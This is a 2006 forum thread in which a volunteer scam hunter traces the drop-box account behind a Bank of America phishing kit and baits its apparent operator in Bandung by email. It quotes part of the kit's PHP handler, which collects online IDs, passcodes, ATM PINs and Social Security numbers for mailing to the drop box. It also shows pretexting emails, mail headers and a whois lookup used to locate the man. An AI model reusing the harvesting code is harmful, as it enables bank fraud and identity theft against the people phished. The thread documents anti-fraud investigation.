how-to block ads
|
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
2 edits | reply to MGD
Re: [Phishing] Bank of America Phish, caught work
Interesting follow up:
Though the digging through phishes looking for and extracting the email drop boxes is both tedious and time consuming, what irks me the most is the failure of the majors to yank the accounts despite frequent larts. If these drop box accounts were pulled promptly, it would prevent the phised data from being recovered. Now that most of the email providers have forsaken the abuse@ and gone to online forms for complaints (Gmail,Yahoo etc.), they have no easy method for reporting them. Getting clueless replies requesting the email headers from the "offending account", despite including snippets from the code clearly indentifying the email address as part of a scam, is frustrating. By the time the issue is escalated to a clued rep, the data is long gone.
With that in mind, I sometimes go back a few weeks afterwards, and recheck the dpop accounts to see if they were cancelled. In addition to using the Rcp to @ the mx server, I also send an email to the address to see if it bounces. I usually include some benign reference to the Phish to see if I can elicit a response, and every now and then I get one.
Two days ago I tested the purisangeh_team@yahoo.com drop box on this BOA phish, now over a month old. I always want to include some trigger in the subject line to try and get attention. In this case I listed the subject as "KASKUS" which is a Indonesian chat forum that was one of the few places where the name Purisangeh had turned up as a poster: »www.kaskus.com/member.php?u=69571 Indonesia became a focus since a previous identical BOA phish which was reported in NANAS on 12/05, was also emailed via the exact same open proxy as this one: »groups.google.com/group/news.adm···e0261745 Coincidentally that phish site was hosted on a hijacked box in Indonesia.
So I sent off the following email to the phish drop box:
From: Macs Retsub
To: purisangeh_team@yahoo.com
Date: Feb 1, 2006 5:53 PM
Subject: Kaskus
Hey, I still have the files from the Bank of America phish.
The address rdcpt0809@airpost.com is dead.
Which other one can I use??
I have the logs too.
I try to make them fuzzy, but throw in a few clues, and hope they respond with their guard down. Well about 24 hours later in pops this:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:06 AM
Subject: Re: Kaskus
What are you talking about???
Ahh, got a hit !! so I responded with some more info, and included a snippet of the BOA phish processing script showing the data collection address.
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 12:16 PM
Subject: Re: Kaskus
The data from the credit card and BOA scam:
Some of the logs were sent to me by mistake??
if(isset($atm_number) || isset($pin))
{ if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin))
{ header("Location: GotoErrorVerifyPage.htm"); return FALSE;} }
session_start();
//USER ACCOUNT
$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin'];
//SECURITY QUESTION
$ssn1 = $_POST['ssn1'];$ssn2 = $_POST['ssn2'];$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Full Info BoA ip :$ip";
$msg = "Full Info From ip :$ip
\nUSER ACCOUNT
\n-------------------
\n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email
\n\nSECURITY QUESTION
\n---------------------
\n\nS S N : $ssn1-$ssn2-$ssn3";
$from = "From: BoA<support@PlatinumBank.com>";
$to = " purisangeh_team@yahoo.com";
I thought that it may break the ice!! or loose him. However, he responded:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 1:28 PM
Subject: Re: Kaskus
By the way who are you and what is your business. I just signed up this email for 2 weeks ago. Maybe you made a mistake of contact to person that you mentioned. Please let me know what can I do for you??
Regard,
Huge
Well! that's a big lie, as I posted above I checked the address at the time of posting the dig and it was valid and I also checked it several times afterwards. Yahoo could not have recylcled it in a 48 hour period. Besides, is there a waiting list for Purasengh_Team at Yahoo. In addition the script files that contained the addy were dated ~12/25. So I responded:
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:05 PM
Subject: Re: Kaskus
You need to check again, this account was active on or before January 1, 2006, who is in the "Team" ??
Within twenty minutes I get this back:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 2:24 PM
Subject: Re: Kaskus
How you can chek it? and who are you? why you investigate me like police? i am musician in New Zealand. Purisangeh is my Group Band Name. What you want ask from me again??
Now I am thinking, is this guy an intern for the Purisangeh Team or what?, I had my red push pin stuck in Jakarta on my world map. Now he says that he is in New Zealand. Well he lied about the two week old email address, so I checked on his honesty by having a look at the mail headers.
X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a
Delivered-To: *******@gmail.com
Received: by 10.48.248.4 with SMTP id v4cs6897nfh;
Thu, 2 Feb 2006 01:06:55 -0800 (PST)
Received: by 10.54.128.14 with SMTP id a14mr2115170wrd;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Return-Path:
Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99])
by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)
DomainKey-Status: good (test mode)
Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=s1024; d=yahoo.com;
h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
Message-ID:
Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST
Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)
From: ariando huge
Subject: Re: Kaskus
To: Macs Retsub
I then did a lookup of IP 222.124.19.29
Location: Indonesia (high) [City: Jakarta, Jakarta Raya (Djakarta Raya)]
inetnum: 222.124.19.16 - 222.124.19.31
netname: TLKM_D3_AST_DUYA_MEDIA
country: ID
descr: PT. DUYA MEDIA
descr: Public Internet Cafe
descr: Jl. Buah Batu No. 165D
descr: Bandung
admin-c: KI32-AP
tech-c: KI32-AP
remarks: ------------------------------------------------------------------
remarks: Send ABUSE and SPAM reports with plain ASCII text only to
remarks: **********@yahoo.com cc to *****@telkom.net.id
remarks: The netname enclosed in square bracket is included in the subject.
remarks: ------------------------------------------------------------------
status: ASSIGNED NON-PORTABLE
changed: ****@telkom.co.id 20050725
mnt-by: MAINT-TELKOMNET
source: APNIC
person: KHAIRIL IMAMI
nic-hdl: KI32-AP
e-mail: **********@yahoo.com
address: Jl. Buah Batu No. 165D
address: BANDUNG
phone: +62227319398
country: ID
changed: ****@telkom.co.id 20050718
mnt-by: MAINT-TELKOMNET
source: APNIC
Ha ha, "huge ariando" you are right where I thought you were, and in an internet cafe no less in downtown Bandung, which is the capital city of West Java Province, about 100 miles southeast of Jakarta. Not exactly New Zealand, so I wrote:
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:53 PM
Subject: Re: Kaskus
Then why are you now at an Internet Cafe in Bandung?? are you on holidays?
What kind of music do you play? what does Purisangeh mean?
I didn't want to blow him away, I wanted to keep him going, so I included an out!
Then I got this:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 3:39 PM
Subject: Re: Kaskus
I still do not understand with you. I am Jazz Musician. We are in concernt here since 28 january. Listen to me, now i really feel annoyed because of you. I dont know you and you not tell me who you are? So stop email me anonymous person.
BYE.
Ouch!!, yes I am sort of anonymous, my email is not traceable. I don't want to loose him just yet, so I take a five minute refresher course in geography. There are several universities in Bandung, I suspect he may be a student. I try to get him back by alluding to be right there, amd throw some local names in.
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 4:26 PM
Subject: Re: Kaskus
Please, do not be annoyed, I like Jazz music too, more progressive though, I am a big fan of DISCUS. Where are you playing at ? the Savoy? maybe I can attend a concert, I checked the papers and I don't see any adverts. Maybe you can come back from New Zealand and play at one of the festivals at Bale Ayer in Taman Ria Senayan in Jakarta, have you ever been there? Try and visit Saung Mang Udjo while you are here. How many are in your band? What instrument do you play?
Wow!! it took all of 4 minutes to get a reply. Boy he sure spends a lot of time on the web in a internet cafe for a on tour "in concert jazz musician"
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:30 PM
Subject: Re: Kaskus
are you indonesian?? " Apa Kabar? " Why you know all about indonesian place? can you chate with me on yahoo messager? My ID is homebeautypink. I am online now.
Regard,
Huge
Well that sure brought him right back, and he is a homeboy, look at that, form a New Zealander to " Apa kabar" all in a few messages. Well I looked it up:
The phrase "apa kabar" literally means "what (your) news". ... To answer "apa kabar", we usually use "baik" or "baik-baik" to indicate that it's good
I never replied to the "invitation" as I would have to use a nearby proxy, plus I am now stuck language wise. I decided to preserve my options, and sleep on it.
I really just want to get an answer to " What the F**k did you do with all the credit card data that came streaming into that account, and what other scams are now ongoing.
MGD
Edit=typo+formatting | |
Ummmyea
@208.17.x.x | How is your email not traceable? | |
pleekmo
Triptoe Through The Tulips
Premium
join:2001-09-14
Manchester, CT
clubs:
| said by Ummmyea :
How is your email not traceable?
Anonymous re-mailer, perhaps.
--
HCN: Because you deserve a rest!
I wonder what Spock would have to say (or do) about Omelas? | |
tapeloop
1959. I try to kick the ball. I miss.
Premium
join:2004-06-27
Airstrip One
|  reply to MGD
MGD, more power to you my brother. I wish I knew Bahasa so I could help you slam dunk this guy. Keep up the good work and keep us posted.
--
Copyright infringement is illegal. Murder is illegal. Therefore, file sharing is murder. | |
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
1 edit | Re: [Phishing] Bank of America Phish, caught work
I guess someone must have sent you a "HEADS UP"
said by purisangeh  :Thank you Macs Retsub for your Big mouth ...... You want be a hero here? Hey that's only a small price that you pay for being a thief and a criminal. Nope, I am not a hero, I just volunteer my time and forensic cyber skills to try and prevent victims from being defrauded.
You are now a member, read my scam hunting posts. I am an "equal opportunity" scam hunter. I follow the trail wherever it leads. Scammers are everywhere, they come in all shapes, sizes, and religions.
....You do not have enough proof to catch me....
Don't bet on it junior!!! Maybe you will read an article about this in your local paper Pikiran Rakyat
. I am sure that the people of Bandung do not like thieves any more than we do.
I hope I can see you as soon as possible, to disccuss our future....
Sure, just so long as your future includes paying a price for your crimes. I have found your fingerprints on many other phishes, so you have been doing this for a while.
I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet..... Great, so why are you using those skills to commit crimes??
instead of doing productive work. Will the universities let you in if they know what you are doing.
Do not be an idiot and bring race and religion into to it. You are a criminal, you got busted !! Face up to it junior..
You spend a lot of time at that Internet Cafe, do you work or live there?? Your emails came from 3 different IP's at the Cafe within a few hours.
MGD
Edit+added link | |
|
